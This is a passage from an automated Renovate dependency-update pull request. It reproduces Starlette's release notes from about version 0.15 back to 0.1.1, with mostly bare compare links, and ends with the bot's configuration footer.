deleted in certain circumstances - [#​1023](https://togithub.com/encode/starlette/pull/1023). - Improved memory usage of `BaseHTTPMiddleware` when handling large responses - [#​1012](https://togithub.com/encode/starlette/issues/1012) fixed via [#​1157](https://togithub.com/encode/starlette/issues/1157) ##### Deprecated/removed - Built-in GraphQL support via the `GraphQLApp` class has been deprecated and will be removed in a future release. Please see [#​619](https://togithub.com/encode/starlette/issues/619). GraphQL is not supported on Python 3.10. - The `executor` parameter to `GraphQLApp` was removed. Use `executor_class` instead. - The `workers` parameter to `WSGIMiddleware` was removed. This hasn't had any effect since Starlette v0.6.3. ### [`v0.14.2`](https://togithub.com/encode/starlette/releases/tag/0.14.2): Version 0.14.2 [Compare Source](https://togithub.com/encode/starlette/compare/0.14.1...0.14.2) ##### Fixed - Fixed `ServerErrorMiddleware` compatibility with Python 3.9.1/3.8.7 when debug mode is enabled - [#​1132](https://togithub.com/encode/starlette/pull/1132). - Fixed unclosed socket `ResourceWarning`s when using the `TestClient` with WebSocket endpoints - [#​1132](https://togithub.com/encode/starlette/issues/1132). - Improved detection of `async` endpoints wrapped in `functools.partial` on Python 3.8+ - [#​1106](https://togithub.com/encode/starlette/pull/1106). ### [`v0.14.1`](https://togithub.com/encode/starlette/releases/tag/0.14.1): Version 0.14.1 [Compare Source](https://togithub.com/encode/starlette/compare/0.14.0...0.14.1) ##### Removed - `UJSONResponse` was removed (this change was intended to be included in 0.14.0). Please see the [documentation](https://www.starlette.io/responses/#custom-json-serialization) for how to implement responses using custom JSON serialization - [#​1074](https://togithub.com/encode/starlette/pull/1047). ### [`v0.14.0`](https://togithub.com/encode/starlette/releases/tag/0.14.0): Version 0.14.0 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.8...0.14.0) ##### Added - Starlette now officially supports Python3.9. - In `StreamingResponse`, allow custom async iterator such as objects from classes implementing `__aiter__`. - Allow usage of `functools.partial` async handlers in Python versions 3.6 and 3.7. - Add 418 I'm A Teapot status code. ##### Changed - Create tasks from handler coroutines before sending them to `asyncio.wait`. - Use `format_exception` instead of `format_tb` in `ServerErrorMiddleware`'s `debug` responses. - Be more lenient with handler arguments when using the `requires` decorator. ### [`v0.13.8`](https://togithub.com/encode/starlette/releases/tag/0.13.8): Version 0.13.8 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.7...0.13.8) - Revert `Queue(maxsize=1)` fix for `BaseHTTPMiddleware` middleware classes and streaming responses. - The `StaticFiles` constructor now allows `pathlib.Path` in addition to strings for its `directory` argument. ### [`v0.13.7`](https://togithub.com/encode/starlette/releases/tag/0.13.7): Version 0.13.7 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.6...0.13.7) - Fix high memory usage when using BaseHTTPMiddleware middleware classes and streaming responses. ### [`v0.13.6`](https://togithub.com/encode/starlette/releases/tag/0.13.6): Version 0.13.6 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.5...0.13.6) - Fix 404 errors with `StaticFiles`. ### [`v0.13.5`](https://togithub.com/encode/starlette/releases/tag/0.13.5): Version 0.13.5 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.4...0.13.5) #### 0.13.5 - Add support for `Starlette(lifespan=...)` functions. - More robust path-traversal check in StaticFiles app. - Fix WSGI PATH_INFO encoding. - RedirectResponse now accepts optional background parameter - Allow path routes to contain regex meta characters - Treat ASGI HTTP 'body' as an optional key. - Don't use thread pooling for writing to in-memory upload files. ### [`v0.13.4`](https://togithub.com/encode/starlette/releases/tag/0.13.4): Version 0.13.4 [Compare Source](https://togithub.com/encode/starlette/compare/0.13.3...0.13.4) - Add UUID convertor. [#​903](https://togithub.com/encode/starlette/issues/903) - More lenient cookie parsing. [#​900](https://togithub.com/encode/starlette/issues/900) ### [`v0.13.3`](https://togithub.com/encode/starlette/compare/0.13.2...0.13.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.13.2...0.13.3) ### [`v0.13.2`](https://togithub.com/encode/starlette/compare/0.13.1...0.13.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.13.1...0.13.2) ### [`v0.13.1`](https://togithub.com/encode/starlette/compare/0.13.0...0.13.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.13.0...0.13.1) ### [`v0.13.0`](https://togithub.com/encode/starlette/compare/0.12.13...0.13.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.13...0.13.0) ### [`v0.12.13`](https://togithub.com/encode/starlette/compare/0.12.12...0.12.13) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.12...0.12.13) ### [`v0.12.12`](https://togithub.com/encode/starlette/compare/0.12.11...0.12.12) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.11...0.12.12) ### [`v0.12.9`](https://togithub.com/encode/starlette/compare/0.12.8...0.12.9) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.8...0.12.9) ### [`v0.12.8`](https://togithub.com/encode/starlette/compare/0.12.7...0.12.8) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.7...0.12.8) ### [`v0.12.7`](https://togithub.com/encode/starlette/compare/0.12.6...0.12.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.6...0.12.7) ### [`v0.12.6`](https://togithub.com/encode/starlette/compare/0.12.5...0.12.6) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.5...0.12.6) ### [`v0.12.5`](https://togithub.com/encode/starlette/compare/0.12.4...0.12.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.4...0.12.5) ### [`v0.12.4`](https://togithub.com/encode/starlette/compare/0.12.3...0.12.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.3...0.12.4) ### [`v0.12.3`](https://togithub.com/encode/starlette/compare/0.12.2...0.12.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.12.2...0.12.3) ### [`v0.12.0`](https://togithub.com/encode/starlette/compare/0.11.4...0.12.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.11.4...0.12.0) ### [`v0.11.4`](https://togithub.com/encode/starlette/compare/0.11.3...0.11.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.11.3...0.11.4) ### [`v0.11.3`](https://togithub.com/encode/starlette/compare/0.11.2...0.11.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.11.2...0.11.3) ### [`v0.11.2`](https://togithub.com/encode/starlette/compare/0.11.1...0.11.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.11.1...0.11.2) ### [`v0.10.7`](https://togithub.com/encode/starlette/compare/0.10.6...0.10.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.10.6...0.10.7) ### [`v0.10.4`](https://togithub.com/encode/starlette/compare/0.10.3...0.10.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.10.3...0.10.4) ### [`v0.10.3`](https://togithub.com/encode/starlette/compare/0.10.2...0.10.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.10.2...0.10.3) ### [`v0.10.2`](https://togithub.com/encode/starlette/compare/0.10.1...0.10.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.10.1...0.10.2) ### [`v0.10.1`](https://togithub.com/encode/starlette/compare/0.10.0...0.10.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.10.0...0.10.1) ### [`v0.10.0`](https://togithub.com/encode/starlette/compare/0.9.11...0.10.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.11...0.10.0) ### [`v0.9.11`](https://togithub.com/encode/starlette/compare/0.9.10...0.9.11) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.10...0.9.11) ### [`v0.9.10`](https://togithub.com/encode/starlette/compare/0.9.9...0.9.10) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.9...0.9.10) ### [`v0.9.9`](https://togithub.com/encode/starlette/compare/0.9.8...0.9.9) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.8...0.9.9) ### [`v0.9.8`](https://togithub.com/encode/starlette/compare/0.9.7...0.9.8) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.7...0.9.8) ### [`v0.9.7`](https://togithub.com/encode/starlette/compare/0.9.6...0.9.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.6...0.9.7) ### [`v0.9.6`](https://togithub.com/encode/starlette/compare/0.9.5...0.9.6) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.5...0.9.6) ### [`v0.9.5`](https://togithub.com/encode/starlette/compare/0.9.4...0.9.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.4...0.9.5) ### [`v0.9.4`](https://togithub.com/encode/starlette/compare/0.9.3...0.9.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.3...0.9.4) ### [`v0.9.3`](https://togithub.com/encode/starlette/compare/0.9.2...0.9.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.2...0.9.3) ### [`v0.9.2`](https://togithub.com/encode/starlette/compare/0.9.1...0.9.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.1...0.9.2) ### [`v0.9.1`](https://togithub.com/encode/starlette/compare/0.9.0...0.9.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.9.0...0.9.1) ### [`v0.9.0`](https://togithub.com/encode/starlette/compare/0.8.8...0.9.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.8...0.9.0) ### [`v0.8.8`](https://togithub.com/encode/starlette/compare/0.8.7...0.8.8) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.7...0.8.8) ### [`v0.8.7`](https://togithub.com/encode/starlette/compare/0.8.6...0.8.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.6...0.8.7) ### [`v0.8.6`](https://togithub.com/encode/starlette/compare/0.8.5...0.8.6) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.5...0.8.6) ### [`v0.8.5`](https://togithub.com/encode/starlette/compare/0.8.4...0.8.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.4...0.8.5) ### [`v0.8.4`](https://togithub.com/encode/starlette/compare/0.8.3...0.8.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.3...0.8.4) ### [`v0.8.3`](https://togithub.com/encode/starlette/compare/0.8.2...0.8.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.2...0.8.3) ### [`v0.8.2`](https://togithub.com/encode/starlette/compare/0.8.1...0.8.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.1...0.8.2) ### [`v0.8.1`](https://togithub.com/encode/starlette/compare/0.8.0...0.8.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.8.0...0.8.1) ### [`v0.8.0`](https://togithub.com/encode/starlette/compare/0.7.4...0.8.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.7.4...0.8.0) ### [`v0.7.4`](https://togithub.com/encode/starlette/compare/0.7.3...0.7.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.7.3...0.7.4) ### [`v0.7.3`](https://togithub.com/encode/starlette/compare/0.7.2...0.7.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.7.2...0.7.3) ### [`v0.7.2`](https://togithub.com/encode/starlette/compare/0.7.1...0.7.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.7.1...0.7.2) ### [`v0.7.1`](https://togithub.com/encode/starlette/compare/0.7.0...0.7.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.7.0...0.7.1) ### [`v0.7.0`](https://togithub.com/encode/starlette/compare/0.6.3...0.7.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.6.3...0.7.0) ### [`v0.6.3`](https://togithub.com/encode/starlette/compare/0.6.2...0.6.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.6.2...0.6.3) ### [`v0.6.2`](https://togithub.com/encode/starlette/compare/0.6.1...0.6.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.6.1...0.6.2) ### [`v0.6.1`](https://togithub.com/encode/starlette/compare/0.6.0...0.6.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.6.0...0.6.1) ### [`v0.6.0`](https://togithub.com/encode/starlette/compare/0.5.5...0.6.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.5...0.6.0) ### [`v0.5.5`](https://togithub.com/encode/starlette/compare/0.5.4...0.5.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.4...0.5.5) ### [`v0.5.4`](https://togithub.com/encode/starlette/compare/0.5.3...0.5.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.3...0.5.4) ### [`v0.5.3`](https://togithub.com/encode/starlette/compare/0.5.2...0.5.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.2...0.5.3) ### [`v0.5.2`](https://togithub.com/encode/starlette/compare/0.5.1...0.5.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.1...0.5.2) ### [`v0.5.1`](https://togithub.com/encode/starlette/compare/0.5.0...0.5.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.5.0...0.5.1) ### [`v0.5.0`](https://togithub.com/encode/starlette/compare/0.4.2...0.5.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.4.2...0.5.0) ### [`v0.4.2`](https://togithub.com/encode/starlette/compare/0.4.1...0.4.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.4.1...0.4.2) ### [`v0.4.1`](https://togithub.com/encode/starlette/compare/0.4.0...0.4.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.4.0...0.4.1) ### [`v0.4.0`](https://togithub.com/encode/starlette/compare/0.3.7...0.4.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.7...0.4.0) ### [`v0.3.7`](https://togithub.com/encode/starlette/compare/0.3.6...0.3.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.6...0.3.7) ### [`v0.3.6`](https://togithub.com/encode/starlette/compare/0.3.5...0.3.6) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.5...0.3.6) ### [`v0.3.5`](https://togithub.com/encode/starlette/compare/0.3.4...0.3.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.4...0.3.5) ### [`v0.3.4`](https://togithub.com/encode/starlette/compare/0.3.3...0.3.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.3...0.3.4) ### [`v0.3.3`](https://togithub.com/encode/starlette/compare/0.3.2...0.3.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.2...0.3.3) ### [`v0.3.2`](https://togithub.com/encode/starlette/compare/0.3.1...0.3.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.1...0.3.2) ### [`v0.3.1`](https://togithub.com/encode/starlette/compare/0.3.0...0.3.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.3.0...0.3.1) ### [`v0.3.0`](https://togithub.com/encode/starlette/compare/0.2.3...0.3.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.2.3...0.3.0) ### [`v0.2.3`](https://togithub.com/encode/starlette/compare/0.2.2...0.2.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.2.2...0.2.3) ### [`v0.2.2`](https://togithub.com/encode/starlette/compare/0.2.1...0.2.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.2.1...0.2.2) ### [`v0.2.1`](https://togithub.com/encode/starlette/compare/0.2.0...0.2.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.2.0...0.2.1) ### [`v0.2.0`](https://togithub.com/encode/starlette/compare/0.1.17...0.2.0) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.17...0.2.0) ### [`v0.1.17`](https://togithub.com/encode/starlette/compare/0.1.16...0.1.17) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.16...0.1.17) ### [`v0.1.16`](https://togithub.com/encode/starlette/compare/0.1.15...0.1.16) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.15...0.1.16) ### [`v0.1.15`](https://togithub.com/encode/starlette/compare/0.1.14...0.1.15) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.14...0.1.15) ### [`v0.1.14`](https://togithub.com/encode/starlette/compare/0.1.13...0.1.14) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.13...0.1.14) ### [`v0.1.13`](https://togithub.com/encode/starlette/compare/0.1.12...0.1.13) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.12...0.1.13) ### [`v0.1.12`](https://togithub.com/encode/starlette/compare/0.1.11...0.1.12) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.11...0.1.12) ### [`v0.1.11`](https://togithub.com/encode/starlette/compare/0.1.10...0.1.11) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.10...0.1.11) ### [`v0.1.10`](https://togithub.com/encode/starlette/compare/0.1.9...0.1.10) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.9...0.1.10) ### [`v0.1.9`](https://togithub.com/encode/starlette/compare/0.1.8...0.1.9) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.8...0.1.9) ### [`v0.1.8`](https://togithub.com/encode/starlette/compare/0.1.7...0.1.8) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.7...0.1.8) ### [`v0.1.7`](https://togithub.com/encode/starlette/compare/0.1.6...0.1.7) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.6...0.1.7) ### [`v0.1.6`](https://togithub.com/encode/starlette/compare/0.1.5...0.1.6) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.5...0.1.6) ### [`v0.1.5`](https://togithub.com/encode/starlette/compare/0.1.4...0.1.5) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.4...0.1.5) ### [`v0.1.4`](https://togithub.com/encode/starlette/compare/0.1.3...0.1.4) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.3...0.1.4) ### [`v0.1.3`](https://togithub.com/encode/starlette/compare/0.1.2...0.1.3) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.2...0.1.3) ### [`v0.1.2`](https://togithub.com/encode/starlette/compare/0.1.1...0.1.2) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.1...0.1.2) ### [`v0.1.1`](https://togithub.com/encode/starlette/compare/0.1.0...0.1.1) [Compare Source](https://togithub.com/encode/starlette/compare/0.1.0...0.1.1)

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

â™» Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR was generated by Mend Renovate. View the repository job log.